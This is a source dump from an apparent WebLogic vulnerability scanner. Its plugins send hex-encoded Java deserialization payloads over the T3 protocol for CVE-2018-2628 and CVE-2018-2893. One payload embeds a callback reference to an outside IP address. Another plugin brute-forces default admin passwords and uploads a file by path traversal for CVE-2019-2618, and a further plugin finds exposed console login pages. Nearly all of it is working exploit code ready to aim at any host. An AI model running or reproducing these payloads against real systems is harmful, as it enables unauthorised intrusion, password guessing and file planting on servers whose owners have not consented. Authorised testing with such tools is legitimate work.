27 | PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
28 | VER_SIG=['\\$Proxy[0-9]+']
29 |
30 |
31 | @ManageProcessor.plugin_register('CVE20182628')
32 | class CVE20182628(object):
33 | def process(self,ip,port):
34 | self.run(ip,port,0)
35 |
36 | def t3handshake(self,sock,server_addr):
37 | sock.connect(server_addr)
38 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
39 | time.sleep(1)
40 | sock.recv(1024)
41 |
42 | def buildT3RequestObject(self,sock,port):
43 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
44 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
45 | data3 = '1a7727000d3234322e323134'
46 | data4 = '2e312e32353461863d1d0000000078'
47 | for d in [data1,data2,data3,data4]:
48 | sock.send(bytes.fromhex(d))
49 | time.sleep(2)
50 |
51 |
52 | def sendEvilObjData(self,sock,data):
53 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
54 | payload+=data
55 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
56 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
57 | sock.send(bytes.fromhex(payload))
58 | time.sleep(2)
59 | sock.send(bytes.fromhex(payload))
60 | res = ''
61 | try:
62 | while True:
63 | res += sock.recv(4096).decode('utf-8','ignore')
64 | time.sleep(0.1)
65 | except Exception:
66 | pass
67 | return res
68 |
69 | def checkVul(self,res,index):
70 | p=re.findall(VER_SIG[index], res, re.S)
71 | if len(p)>0:
72 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
73 | print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
74 | print(Vcolors.OKGREEN+'[+]CVE-2018-2628 漏洞存在'+Vcolors.ENDC)
75 | else:
76 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
77 | print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)
78 |
79 | def run(self,ip,port,index):
80 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
81 | sock.settimeout(15)
82 | server_addr = (ip, port)
83 | self.t3handshake(sock,server_addr)
84 | self.buildT3RequestObject(sock,port)
85 | rs=self.sendEvilObjData(sock,PAYLOAD[index])
86 | self.checkVul(rs,index)
87 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2018-2893.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2018-2893.py
4 | @Time : 2019/07/06 01:40:24
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import socket
14 | import time
15 | import re
16 | import sys
17 | import logging
18 |
19 | from ..platform import ManageProcessor
20 | from lib import *
21 |
22 |
23 | logging.basicConfig(filename='Weblogic.log',
24 | format='%(asctime)s %(message)s',
25 | filemode="w", level=logging.INFO)
26 | VUL='CVE-2018-2893'
27 | PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878']
28 | VER_SIG=['StreamMessageImpl']
29 |
30 |
31 | @ManageProcessor.plugin_register('CVE20182893')
32 | class CVE20182893(object):
33 | def process(self,ip,port):
34 | self.run(ip,port,0)
35 |
36 | def t3handshake(self,sock,server_addr):
37 | sock.connect(server_addr)
38 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
39 | #print(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a').decode('utf-8').encode())
40 | time.sleep(1)
41 | res = sock.recv(1024)
42 | #print(res)
43 | #print('handshake successful')
44 |
45 | def buildT3RequestObject(self,sock,port):
46 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
47 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
48 | data3 = '1a7727000d3234322e323134'
49 | data4 = '2e312e32353461863d1d0000000078'
50 | for d in [data1,data2,data3,data4]:
51 | sock.send(bytes.fromhex(d))
52 | time.sleep(2)
53 | #print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))
54 |
55 |
56 | def sendEvilObjData(self,sock,data):
57 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
58 | payload+=data
59 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
60 | #print('%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload))
61 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
62 | sock.send(bytes.fromhex(payload))
63 | time.sleep(2)
64 | sock.send(bytes.fromhex(payload))
65 | #res2 = sock.recv(4096)
66 | #time.sleep(2)
67 | #print('res2: -------')
68 | #print(res2)
69 | res = ''
70 | try:
71 | while True:
72 | res += sock.recv(4096).decode('utf-8','ignore')
73 | time.sleep(0.1)
74 | except Exception:
75 | pass
76 | #print('res+: ---',res)
77 | return res
78 |
79 | def checkVul(self,res,index):
80 | p=re.findall(VER_SIG[index], res, re.S)
81 | if len(p)>0:
82 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL))
83 | print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Vcolors.ENDC)
84 | print(Vcolors.OKGREEN+'[+]CVE-2018-2893 漏洞存在'+Vcolors.ENDC)
85 | else:
86 | logging.info('[-]Target weblogic not detected {}'.format(VUL))
87 | print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Vcolors.ENDC)
88 |
89 | def run(self,ip,port,index):
90 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
91 | sock.settimeout(10)
92 | server_addr = (ip, port)
93 | self.t3handshake(sock,server_addr)
94 | self.buildT3RequestObject(sock,port)
95 | rs=self.sendEvilObjData(sock,PAYLOAD[index])
96 | self.checkVul(rs,index)
97 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2018-2894.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2018-2894.py
4 | @Time : 2019/07/06 01:42:03
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import requests
14 | import re
15 | import logging
16 |
17 |
18 | from ..platform import ManageProcessor
19 | from lib import *
20 |
21 | logging.basicConfig(filename='Weblogic.log',
22 | format='%(asctime)s %(message)s',
23 | filemode="w", level=logging.INFO)
24 |
25 | VUL=['CVE-2018-2894']
26 | headers = {'user-agent': 'ceshi/0.0.1'}
27 |
28 | @ManageProcessor.plugin_register('CVE20182894')
29 | class CVE20182894(object):
30 | def process(self,ip,port):
31 | self.run(ip,port,0)
32 |
33 | def islive(self,ur,port):
34 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/resources/setting/options/general'
35 | r = requests.get(url, headers=headers)
36 | return r.status_code
37 |
38 | def run(self,url,port,index):
39 | if self.islive(url,port)!=404:
40 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
41 | print(Vcolors.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Vcolors.ENDC)
42 | print(Vcolors.OKGREEN+'[+]CVE-2018-2894 漏洞存在'+Vcolors.ENDC)
43 | else:
44 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
45 | print(Vcolors.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Vcolors.ENDC)
46 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2019-2618.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : CVE-2019-2618.py
4 | @Time : 2019/07/06 01:42:37
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | import requests
14 | import sys, re
15 | import traceback
16 |
17 | from ..platform import ManageProcessor
18 | from lib import *
19 |
20 | # 这个漏洞接口只能爆破5次密码,不然就会一直失败,因此比较鸡肋,存在一定运气成分。
21 | passwd = ['weblogic','weblogic1','weblogic10','weblogic123','Oracle@123']
22 |
23 | @ManageProcessor.plugin_register('CVE20192618')
24 | class CVE20192618(object):
25 | def process(self,ip,port):
26 | self.run(ip,port)
27 | def check(self,url):
28 | vuln_url = url + "/bea_wls_deployment_internal/DeploymentService"
29 | payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name=\"file\"; filename=\"11.tmp\"\r\nContent-Type: text/html\r\n\r\n 12341234 \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--"
30 | success = False
31 | for password in passwd:
32 | headers = {
33 | 'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma",
34 | "username":"weblogic",
35 | "password":password,
36 | 'wl_request_type': "app_upload",
37 | 'wl_upload_application_name': "/",
38 | 'archive': "true",
39 | }
40 | try:
41 | req = requests.post(url=vuln_url, data=payload,headers=headers)
42 | if "DeploymentService" not in req.text and req.status_code == 200 and '11.tmp' in req.text:
43 | serverName = re.findall('/servers/(.*?)/upload/', req.text, re.S)[0]
44 | print(Vcolors.OKBLUE+"[+]口令爆破成功:weblogic/" + password+Vcolors.ENDC)
45 | print(Vcolors.OKBLUE+"[+]weblogic服务名:" + serverName+Vcolors.ENDC)
46 | path = self.get_path(serverName)
47 | print(Vcolors.OKBLUE+"[+]8位随机字符目录:" + path+Vcolors.ENDC)
48 | self.testupload(url,password,path)
49 | success = True
50 | print(Vcolors.OKGREEN+"[+]CVE-2019-2618 漏洞存在"+Vcolors.ENDC)
51 | break
52 | else:
53 | print(Vcolors.FAIL+"[-]口令爆破失败:weblogic/" + password+Vcolors.ENDC)
54 | pass
55 | except:
56 | #print("[-]口令请求异常:weblogic/" + password)
57 | traceback.print_exc()
58 | pass
59 | if True != success:
60 | print(Vcolors.FAIL+"[-]target Weblogic is not Vul CVE-2019-2618"+Vcolors.ENDC)
61 |
62 |
63 | def testupload(self,url,password,path):
64 | vuln_url = url + "/bea_wls_deployment_internal/DeploymentService"
65 | headers = {
66 | 'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma",
67 | "username":"weblogic",
68 | "password":password,
69 | 'wl_request_type': "app_upload",
70 | 'wl_upload_application_name': "..",
71 | 'archive': "true",
72 | }
73 | shell = "21232f297a57a5a743894a0e4a801fc3"
74 | payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name=\"file\"; filename=\"/tmp/_WL_internal/bea_wls_deployment_internal/{0}/war/test.tmp\"\r\nContent-Type: text/html\r\n\r\n {1} \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--".format(path,shell)
75 | upload_path = url + "/bea_wls_deployment_internal/test.tmp"
76 | try:
77 | req = requests.post(url=vuln_url, data=payload,headers=headers)
78 | req = requests.get(upload_path)
79 | if req.status_code == 200:
80 | print(Vcolors.OKBLUE+"[+]上传文件成功: " + upload_path+Vcolors.ENDC)
81 | except:
82 | print(Vcolors.FAIL+"[-]上传文件失败....."+Vcolors.ENDC)
83 |
84 | # 以下为webloigc服务8位随机字符目录计算代码
85 | def convert_n_bytes(self,n, b):
86 | bits = b * 8
87 | return (n + 2 ** (bits - 1)) % 2 ** bits - 2 ** (bits - 1)
88 |
89 | def convert_4_bytes(self,n):
90 | return self.convert_n_bytes(n, 4)
91 |
92 | def getHashCode(self,s):
93 | h = 0
94 | n = len(s)
95 | for i, c in enumerate(s):
96 | h = h + ord(c) * 31 ** (n - 1 - i)
97 | return self.convert_4_bytes(h)
98 |
99 | def toString(self,strs,radix):
100 | i = int(strs)
101 | digits = [
102 | '0' , '1' , '2' , '3' , '4' , '5' ,
103 | '6' , '7' , '8' , '9' , 'a' , 'b' ,
104 | 'c' , 'd' , 'e' , 'f' , 'g' , 'h' ,
105 | 'i' , 'j' , 'k' , 'l' , 'm' , 'n' ,
106 | 'o' , 'p' , 'q' , 'r' , 's' , 't' ,
107 | 'u' , 'v' , 'w' , 'x' , 'y' , 'z'
108 | ]
109 | buf = list(range(65))
110 | charPos = 64
111 | negative = int(strs) < 0
112 | if not negative:
113 | i = -int(strs)
114 |
115 | while (i<=-radix):
116 | buf[int(charPos)] = digits[int(-(i%radix))]
117 | charPos = charPos - 1
118 | i = int(i / radix)
119 | buf[charPos] = digits[int(-i)]
120 | if negative:
121 | charPos = charPos - 1
122 | buf[charPos] = '-'
123 | return (buf[charPos:charPos+65-charPos])
124 |
125 | def get_path(self,serverName):
126 | strings = "%s_%s_%s" % (serverName,"bea_wls_deployment_internal","bea_wls_deployment_internal.war")
127 | return "".join(self.toString(self.getHashCode(strings),36)).replace("-","")
128 |
129 | def run(self,ip,port):
130 | url = 'http://'+str(ip)+':'+str(port)
131 | self.check(url)
132 |
--------------------------------------------------------------------------------
/app/plugins/WeblogicConsole.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : WeblogicConsole.py
4 | @Time : 2019/07/06 01:45:28
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import logging
13 | import sys
14 | import requests
15 |
16 | from ..platform import ManageProcessor
17 | from lib import *
18 |
19 | logging.basicConfig(filename='app/Weblogic.log',
20 | format='%(asctime)s %(message)s',
21 | filemode="w", level=logging.INFO)
22 |
23 | url = "http://192.168.3.32:7001/"
24 |
25 |
26 | @ManageProcessor.plugin_register('weblogic-console')
27 | class WeblogicCosole(object):
28 | headers = {'user-agent': 'ceshi/0.0.1'}
29 | def process(self,ip,port):
30 | self.run(ip,port)
31 | def islive(self,ur,port):
32 | url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp'
33 | r = requests.get(url, headers=self.headers)
34 | return r.status_code
35 |
36 | def run(self,url,port):
37 | if self.islive(url,port)==200:
38 | u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp'
39 | logging.info("[+]The target Weblogic console address is exposed! The path is: {} Please try weak password blasting!".format(u))
40 | print(Vcolors.OKBLUE+"[+]The target Weblogic console address is exposed!\n[+]The path is: {}\n[+]Please try weak password blasting!".format(u)+Vcolors.ENDC)
41 | print(Vcolors.OKGREEN+'[+]Weblogic后台路径存在'+Vcolors.ENDC)
42 | else:
43 | logging.info('[-]Target Weblogic console address not found!')
44 | print(Vcolors.FAIL+"[-]Target Weblogic console address not found!"+Vcolors.ENDC)
45 |
--------------------------------------------------------------------------------
/app/plugins/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : __init__.py
4 | @Time : 2019/08/02 10:48:57
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | __all__ = ['WeblogicConsole','CVE-2014-4210','CVE-2019-2725','CVE-2019-2729','CVE-2017-10271','CVE-2017-3506','CVE-2019-2618','CVE-2018-2894','CVE-2018-2628','CVE-2018-2893','CVE-2016-0638','CVE-2016-3510','CVE-2017-3248',]
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2014-4210.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2014-4210.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2016-0638.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2016-0638.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2016-3510.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2016-3510.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2017-10271.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2017-10271.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2017-3248.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2017-3248.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2017-3506.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2017-3506.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2018-2628.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2018-2628.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2018-2893.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2018-2893.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2018-2894.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2018-2894.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2019-2618.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2019-2618.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2019-2725.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2019-2725.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2019-2729.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2019-2729.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/WeblogicConsole.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/WeblogicConsole.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_006.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_006.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_009.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_009.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_013.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_013.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_016.cpython-37.pyc:
--------------------------------------------------------------------------------
